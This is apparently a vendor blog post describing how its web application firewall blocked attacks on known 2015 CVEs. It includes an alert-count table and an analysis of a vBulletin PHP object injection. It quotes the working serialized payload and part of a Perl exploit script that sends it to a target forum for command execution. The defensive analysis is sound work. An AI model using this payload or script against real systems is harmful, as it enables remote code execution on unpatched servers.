Virtual patching to the rescue – How SecureSphere WAF is protecting against vulnerabilities

 

Virtual Patching may have its humble beginnings from when the IPS devices first reaped its benefits, today it is, even more, invaluable in our fight against zero-day attacks against web applications. We are going to take a deeper look into how Imperva SecureSphere WAF virtual patching is protecting web applications in the real world.

We did extensive analysis of the CVEs in the blocked alerts for the first two weeks of December following the CVE disclosure and subsequent immediate mitigation done on Imperva SecureSphere WAF.

 

 

CVE Description Sum of count Distinct Count of serverGroup
CVE-2015-5227: WordPress Landing Pages Plugin Remote Command Execution 1931 35
CVE-2015-1398: Magento Shoplift Vulnerability 1740 159
CVE-2015-7808  vBulletin PHP object injection 1561 109
CVE-2015-1635: Microsoft HTTP.sys DoS 322 18
CVE-2015-4455 Gravity Forms WordPress File Upload 203 6
CVE-2015-4455 Aviary Image Editor file upload 203 6
CVE-2015-2825: WordPress Simple Ads Manager plugin File Upload 146 15
MS15-034/CVE-2015-1635 Attacking Windows Webservers 92 10
MS15-034/CVE-2015-1635 Attacking Windows Webservers 2 92 10
CVE-2015-4133: ReFlex Gallery WordPress plugin File Upload 86 16
CVE-2015-2208: phpMoAdmin Remote Command Execution 37 13
CVE-2015-5461: WordPress StageShow Open Redirect 24 6
CVE-2015-1635: Microsoft HTTP.sys DoS_user_defined 14 1
CVE-2015-1635: Microsoft HTTP.sys DoS – SOC 14 1
CVE-2015-4852: Apache Commons and Oracle WebLogic Remote Command Execution – 5 9 1
CVE-2015-4852 Deserialization vulnerability 8 9 1
CVE-2015-4134: phpwind Open Redirect 7 1
CVE-2015-4553: DedeCMS Unrestricted File Upload – 1 4 1
CVE-2015-6914: SiteFactory CMS Absolute Path Traversal-2 3 1
Malformed URL rketing-treng/2015-top-digital-marketing-trends-infographic-recap/ 2 1
CVE-2015-1587: Maarch File Upload 2 1
CVE-2015-4852 Deserialization vulnerability smd.jsp 1 Detection Only 2 2
CVE-2015-5471: WordPress Swim Team Plugin Path Traversal 1 1
CVE-2015-5609: WordPress Image Export Plugin Path Traversal 1 1
Grand Total 6505 416

CVE-2015-5227 (Row 1)  is a WordPress Remote Code Execution vulnerability that attackers have tried to exploit but were clearly blocked by Imperva. In most cases customers also use dynamic profiling and deploy a positive security model where any anomalous access gets automatically blocked even before the ADC content update happens. The continuous updates from Imperva ADC ensures immediate protection against such high profile CVEs.

The more interesting one is CVE-2015-7808  vBulletin PHP object injection where we first suspected a false positive given the high number of hits and server groups. We put on our detective hats, got our magnifying glasses out and further analyzed the payloads from these events.

The majority of events used the following payload (extracted from our community defense data)

[O:12:”vB_dB_Result”:2:{s:5:” * db”;O:11:”vB_Database”:1:{s:9:”functions”;a:1:{s:11:”free_result”;s:6:”system”;}}s:12:” * recordset”;s:20:”echo $((0xfee10000))”;}]

It was no accident that the code snippet is a match to this piece of code from pastebin. The complete listing can be found here http://pastebin.com/r3PgT4Yh

 

system(($^O eq ‘MSWin32’) ? ‘cls’ : ‘clear’);
use LWP::UserAgent;
use LWP::Simple;
$ua = LWP::UserAgent ->new;print “nt Enter Target [ Example:http://target.com/forum/ ]”;
print “nn t Enter Target : “;
$Target=<STDIN>;
chomp($Target);
$response=$ua->get($Target . ‘/ajax/api/hook/decodeArguments?arguments=O:12:“vB_dB_Result”:2:{s:5:“%00*%00db”;O:11:“vB_Database”:1:{s:9:“functions”;a:1:{s:11:“free_result”;s:6:“system”;}}s:12:“%00*%00recordset”;s:20:“echo%20$((0xfee10000))”;}’);

We can clearly see that right after we identify the signature echo $((0xfee10000)), there is an object injection that follows.

Vulnerabilies always exist in software, what we constantly notice is how quickly the frequency of attacks increases from the time the CVE is published. Imperva ADC team works round the clock to keep abreast of vulnerabilites via both official and adhoc channels and quickly publishes mitigations taking into account the severity of the CVEs. Virtual Patching is fundamentally important to contain zero day attacks by deploying mitigations quickly without needing to update server software. In this never ending game of cat and mouse, Imperva ADC team is providing the edge and helping our customers stay protected.